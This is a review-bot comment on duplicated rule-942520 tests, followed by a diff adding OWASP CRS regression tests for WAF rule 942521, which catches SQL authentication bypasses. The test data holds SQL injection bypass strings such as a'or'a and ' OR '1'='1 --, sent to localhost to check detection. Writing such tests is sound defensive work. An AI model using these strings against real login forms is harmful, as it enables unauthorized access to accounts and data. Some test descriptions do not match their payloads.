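Review bot: Test 942520-5 is described as covering `'not like glob'` but its `data:` line is byte-identical to 942520-4 (`var=id'not%20glob-id--`), so the "not like glob" variant named in the description is never actually sent and a regression in that branch of rule 942520 would go unnoticed; either give 942520-5 a payload that contains the `not like glob` form it claims to test or drop it as a duplicate. The test numbering also jumps from 942520-12 to 942520-14, which suggests a case was removed without renumbering, and the description of 942520-10 reads `Nagive test` where `Negative test` is meant. Finally, the inline comment on 942520-12 (`# x'email--`) does not show the operator the `%3E` payload actually carries; if that is not an extraction artefact, the comment should spell out the decoded form like its siblings do.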
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml new file mode 100644 index 0000000000..848720a522 --- /dev/null +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml 
@@ -0,0 +1,387 @@ +--- +meta: + author: "terjanq, Franziska Bühler" + description: "Detects basic SQL authentication bypass attempts 4.1/4" + enabled: true + name: 942521.yaml +tests: + - test_title: 942521-1 + desc: "Detects the most basic authentication bypass with 'or'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=a'or'a" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-2 + desc: "Detects basic SQLite authentication bypass with 'or?'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=a'or?--" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-3 + desc: "False-positive: Detects or-based authentication bypass" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=is%20this%20your%20parents'%20or%20yours?" 
+ version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-4 + desc: "Detects basic SQL auth bypass and-based" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=user'and%20id%20is%20not?--" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-5 + desc: "False-positve: is it your parents' or yours" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=it%20is%20your%20parents'%20and%20yours" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-6 + desc: "Negative test: bob's or alice's" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=bob's%20or%20alice's" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-7 + desc: "Negative test: mother or daugher" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=mother%20or%20daughter" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-8 + desc: "Negative test: 'oreo" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='oreo" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-9 + desc: "Negative test: 'fork" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='fork" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-10 + desc: "Negative test: 'for" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='%20for" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-11 + desc: "Negative test: ''or" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=''or" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-12 + desc: "Negative test: 'books' or 'applles'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=''or" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-13 + desc: "Negative test: bob's presentation's 'or'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=''or" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-14 + desc: "Bypass with '''or 1" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='''or%201" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-15 + desc: "False-negative: Not detected with escapes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=%5C'lol'%20or%20'1" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-16 + desc: "Negative test: Wikipedia article about SQLi" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: 
"var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20datab
ases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-17 + desc: "Performance test" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: 
"var=%21%21%21%21%21%27...%22%21%21%27.%22.%60...%27.....%27%40%60%21%21%21%21%21%60....%22%40%40%40%40%40%60%21%21%21%21%21%27%40%60%40%40%40%40%40%27...%22%27%40%40%40%40%40%27%22...%27%21%21%21%60%21%21%60%40%40%22%27%40%40%60..%27%21%21%27%40%40%40%40%22%40%40%40%40%40%60%21%21%21%21%27%21%22%40%40%40%40%40%27%21%21%21%60%21%21%21%21%22%21%21%21%22%21%21%21%21%21%27....%27%27%40%27%22.%60%40%40%40%40%60%27%21%21%22%40%60%40%40%40%40%27%21%27%21%27.....%27%21%21%21%60%40%40%40%60.%27%21%21%60%21%27%21%21%21%60%21%21%21%21%21%60%22%40%60%40%40%40%60%21%21%21%27%40%60%40%40%40%40%22...%22%21%21%21%21%21%27%40%40%40%27%21%27.....%27%21%21%21%27....%60%40%40%40%60%40%22...%60...%27%40%40%40%40%40%60...%22%40%40%40%40%22..%22%40%40%40%60%60%21%22%40%40%40%22%40%40%40%22%40%40%40%22..%22%27....%60%21%21%27%40%22...%27%40%40%40%40%22%40%40%40%22%21%21%21%21%21%27...%60...%22%21%21%21%21%60%40%40%40%27%21%27%40%40%40%40%40%22%40%40%40%60.....%22....%22%27....%22%22%21%21%21%21%22%40%40%27%21%21%21%21%21%22....%27%21%21%21%21%21%22%21%21%21%60%40%40%40%40%22%40%22%40%40%40%27%40%40%40%40%40%22%21%21%21%21%21%22%60%21%21%21%21%22%40%40%40%40%27%60%60%60..%22...%22%21%21%21%27%21%60%22%40%40%40%60%21%21%21%60%22%40%40%40%40%27%27%60%40%40%40%40%22.....%27%27..%22%40%40%40%22%21%21%21%21%60%40%40%40%40%40%27%21%21%21%21%22.%60%40%40%40%40%40%60%60%21%21%60%21%21%21%21%22%21%21%22.%60%27%40%40%27%40%40%40%60%21%21%21%21%21%22%21%21%21%21%21%27%40%40%40%40%27%21%21%21%21%21%60%40%40%40%40%40%22.....%60%60.%22%40%40%22.%27%21%21%21%21%21%27%21%21%27%40%40%40%22%60.....%60%40%40%27%22%40%40%40%40%60%27%22%40%40%40%40%60%21%21%21%21%27%22%21%21%21%21%60%21%60%40%40%40%40%22%40%40%40%40%22%21%21%22%21%21%21%21%21%27%40%40%22...%60%22%27.%60%22%40%22%40%40%40%40%40%22%21%21%22%21%21%21%21%22%40%40%40%60%40%40%27%21%21%22.....%60%21%21%21%60%40%40%22%40%60%40%40%40%60%27....%27%40%40%40%22%60%40%40%40%40%40%60%60%21%21%22%40%22..%27%21%21%21%21%21%60%40%40%40%40%27....%22.....%27%60
%21%21%21%27%21%22%40%60%60%27%60%27%40%27%40%40%40%40%27%21%21%27%40%40%60%21%22%60%21%21%21%27..%22%27%40%40%40%60%60.....%27.....%27%40%40%22%22%27.....%22.%60%21%60%40%40%60%21%60%40%40%40%40%27%40%40%40%27%22..%60%21%60%40%40%40%60%60%40%40%40%40%22%21%21%21%21%21%22.%60%21%21%27%60%40%40%40%40%60%40%40%40%40%40%27%22.%22...%27...%27.....%27%40%40%40%40%40%60.%27%40%40%40%27%21%21%21%21%21%22%40%22%40%60%27%21%21%21%27%40%27%40%40%40%40%60%40%40%40%40%60%27%40%40%40%40%40%60%21%21%21%60%40%40%22...%60..%27.....%27.%27%27%21%60.%22%22%21%21%21%27.....%22%40%40%40%22%40%40%40%40%40%60...%27.%60%22..%27%21%60%21%21%21%21%60..%60....%22%27%40%40%40%40%22..%27.%27....%27%40%40%60...%22%21%22%22%21%60%21%21%21%21%21%27%21%21%27%22%27....%27%22%21%21%21%27%40%40%40%27.....%22...%60..%60%40%40%40%40%40%60%22%40%40%60.%27%21%27%21%21%21%21%21%27....%60%21%21%21%27%21%27%40%60%60...%22%21%21%21%21%60%27%40%22%22%40%22...%60%40%40%27..%22%21%21%21%21%60..%27%40%40%27%40%40%27..%22%40%40%40%40%60....%60%40%40%40%60%40%40%40%40%60%22%21%21%21%60%21%60%40%40%40%22..%27%40%40%40%60%40%40%60%60%22%40%40%40%40%22%21%21%60%40%40%22%40%60%21%21%60%27.....%27%40%40%40%40%40%22.%60%21%21%21%21%60%21%21%60.....%22%21%21%27%27%21%22%40%40%40%27%27%22%40%40%40%40%60....%60%22.%27%21%21%21%27%40%40%40%40%60...%27..%60%21%21%60...%60%21%60%40%40%27.....%27%40%40%27%27%40%40%27..%27.%27%40%22%27%21%22%40%40%22%21%21%21%27%60.....%60.....%22.%60%40%60%40%40%40%60..%22.....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%40%40%22%40%40%40%40%40%27....%60.%27....%27%21%21%21%60%21%21%21%21%21%60..%27.%27%40%40%22%60%40%40%40%60.....%27...%27%21%21%21%21%60..%60....%60%40%40%40%27%21%21%21%27%60%21%21%21%21%27...%60%40%40%40%60....%60%27%40%40%40%40%27%40%40%60..%27%40%40%27..%27%22%21%22%40%40%40%27...%22%21%21%21%21%21%60%40%40%40%40%40%22%40%40%40%40%22%60%21%27..%60%21%21%21%27%40%40%40%22%21%21%21%21%27%40%40%40%40%22%40%60%22.....%22.....%27%40%40%40%40%40%27%21%21%21%21%27%40%27%40%40%40
%40%40%27%60%27%22%21%22%21%21%21%21%60%40%40%40%40%40%27..%22.%60%40%40%40%40%40%22.%60%60%21%21%21%21%21%60%21%21%21%22...%60%40%22%21%21%21%21%22%21%21%60%40%40%40%40%60%21%21%21%21%22%40%27%21%21%21%60%27%40%40%40%40%22.....%60....%22...%60%21%21%21%21%60%21%21%21%21%21%27%40%40%60%40%40%40%40%27%40%60%21%22.....%22%21%21%21%27%40%40%40%40%27....%22%40%40%40%40%40%60%40%27.....%22%21%21%21%60%40%40%60%21%21%21%21%21%22%60%40%40%40%40%27%21%21%21%22...%60%40%60...%27...%60%21%21%21%22%21%21%21%21%27%21%27%21%21%60.%60%21%21%60..%22..%60.....%22..%22....%27%21%21%21%21%27%60%40%40%40%40%40%22%21%21%21%21%22%40%40%40%40%40%27%40%40%40%40%40%60.%60....%60%60%40%40%40%40%22%27%40%27%40%60%21%21%21%21%21%27...%27%40%40%40%40%40%27.%27.....%60%21%21%60%21%21%21%21%21%22%22%40%40%40%27%40%60%21%21%21%22%21%21%21%21%21%27..%22....%27%21%21%21%21%21%27...%60.....%60%40%22%21%21%21%21%27%27%21%21%21%21%21%22%60%27%21%21%21%27..%60%40%60%21%21%21%21%21%27%60%27%21%21%27%21%21%21%60%21%21%21%21%27%40%60%22%21%60.....%27%40%40%40%40%40%27.....%60%21%21%60%40%40%40%27...%60%21%21%21%60%40%40%40%22%22%21%21%21%21%21%22%40%40%40%40%27%40%22.%22.%22%40%40%40%40%40%22%40%60....%60....%27%21%21%21%21%21%22%21%21%21%21%60%21%21%21%21%21%27....%27%21%21%21%21%60%22%60%40%40%40%40%40%60...%22%40%60%40%40%22%40%40%40%40%40%27%21%21%27%22%40%40%60%27%22%40%40%40%22%21%60%27%21%21%21%21%21%60...%27%40%40%22%21%21%21%27%21%27%21%21%21%60%21%21%21%21%21%60%22.....%22%21%21%21%21%27%40%40%40%40%60%21%21%27.....%22%21%21%21%22%21%21%22%21%21%22%40%40%27%21%21%21%21%22%40%40%40%40%27%40%40%40%40%27....%60%40%40%40%60%40%22...%27.....%27%40%40%22%40%40%40%22%21%21%21%21%21%22...%27..%22%21%22%40%40%40%40%40%27....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%22%27%40%40%40%40%40%60%21%21%21%27%40%40%40%27%60.%27%21%21%21%22....%60%40%27.....%22%40%40%40%40%40%27%40%60%40%40%40%40%60%40%40%40%60%21%21%21%21%21%60%27%21%21%21%27....%22%22%21%21%27...%27%21%21%21%27...%27%40%22....%22%40%40%27%21
%21%21%21%27.....%22%40%40%40%40%27%22....%22...%27%21%21%21%60....%22%40%40%40%22...%27%40%27..%60%21%21%27%40%40%40%40%40%60%40%60%21%21%21%21%21%27.....%60%27%22%22%27%27.%22%60%21%21%22%40%40%60%21%22%60%21%21%27..%60%21%21%21%21%60%21%21%21%21%21%60%40%40%22%21%21%21%21%21%60%40%40%60....%60%40%40%40%40%40%22%40%40%40%40%60.....%60%27%27...%27%22%22%40%40%60.....%22%22%27%40%60%27%27.....%22%40%27%60.....%60%40%22%40%40%40%40%27%21%21%21%21%60%40%40%40%27%40%40%40%40%40%22%21%21%21%21%60.%22%21%21%27%40%27%22%21%21%21%21%60%40%40%27%40%40%40%40%27%21%21%27%27..%27%27%21%21%21%21%21%27%40%27.%60%21%21%21%21%21%27%40%40%40%40%27%21%21%27%40%40%40%40%22...%22%60%27%40%40%40%22%40%40%40%22%22%21%21%21%22%21%21%60...%27.....%60%40%40%40%60%21%21%21%60%40%40%40%40%40%22%22%21%21%21%60%21%21%21%21%21%27%27%21%21%21%21%22....%27%21%21%21%21%21%27%21%21%21%22%21%21%21%21%21%27%22....%60%27%40%40%27%21%27.....%22%21%22%21%21%21%21%21%22%21%21%21%21%22...%27%22%40%40%40%60%40%40%40%40%40%27%27%21%21%27....%22.....%22%21%21%21%22%40%40%40%40%40%27%21%21%21%21%60%22.....%60..%60%22%21%21%21%22%22%27...%27%40%40%40%40%27.....%27%21%21%21%60...%27.%22%21%21%21%21%21%27%21%27%21%21%21%22%40%27.....%27%21%21%21%21%22%40%27...%27%21%21%27%40%40%22%40%40%40%40%40%60..%27%21%27.....%22%22%21%21%21%21%21%27%40%40%40%40%22%40%40%40%60.....%60%21%21%21%21%21%27....%27%27%40%40%40%40%27.....%27%21%60....%22...%22%21%21%21%21%27%21%21%22%40%27%40%40%40%40%40%27%21%21%21%22%21%21%21%21%27%21%21%21%21%60%27%27..%22%22%21%21%21%27%22%21%60..%22%27%27%60..%22%21%22%21%21%21%21%21%27..%27..%27.%27%27%21%21%21%21%60%27%21%21%21%21%60..%27%21%21%22.....%22%21%21%21%21%27%21%21%21%27....%60.....%22...%22%22%22.%22%27.%60%21%21%21%21%22%60%40%22.....%27%21%21%21%21%22%40%60...%22.%22.....%27%27..%22%27%21%21%21%21%21%60....%22%21%21%21%22..%60%21%21%21%21%60%21%21%21%21%27....%60%27%40%40%40%22%27.%27....%22%40%40%40%60%21%21%21%21%22%40%40%40%40%40%27%21%21%21%60%40%40%40%40%60.%22..%22%40%40%
22%21%60%22%21%21%21%21%27%27%27.%27%22%40%40%40%22%40%40%40%27....%22%21%21%21%21%21%22%21%21%21%21%22%21%27%60%27%21%21%21%60%21%27...%60%21%21%21%21%27...%27%40%40%40%40%40%60%21%21%60%21%21%21%22%40%60%40%40%40%40%40%60%27%60..%22%22%21%21%27%22%40%40%27...%22..%22....%22%27%60%40%40%27....%27%40%40%40%40%22%60%21%21%60.%60%40%27%21%60%21%22...%27...%27.....%27%21%21%22..%22%22%40%27%21%21%21%27%40%40%22.%27%21%21%21%60%40%60%60%21%21%21%60%21%21%22...%27.%22%21%21%21%27...%22%21%21%21%21%60%40%40%40%40%60%22.%27%21%21%60.....%60%21%21%60%21%21%21%21%21%27.%27%40%40%40%40%40%22%21%21%21%60..%27%21%21%21%21%21%27%21%21%60%40%40%27%21%21%21%27.%22%21%21%21%21%22.%22%40%40%40%40%40%22%21%21%21%22%21%21%22%22%21%21%21%60%27%21%21%60%40%40%40%40%40%27..%27%40%60.....%22%21%21%21%27.%27%21%21%21%21%27%27....%22%40%40%27%40%40%40%40%40%60%60or" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-18 + desc: "Performance test" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: 
"var='.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'
.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-19 + desc: "Negative test: performance test" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.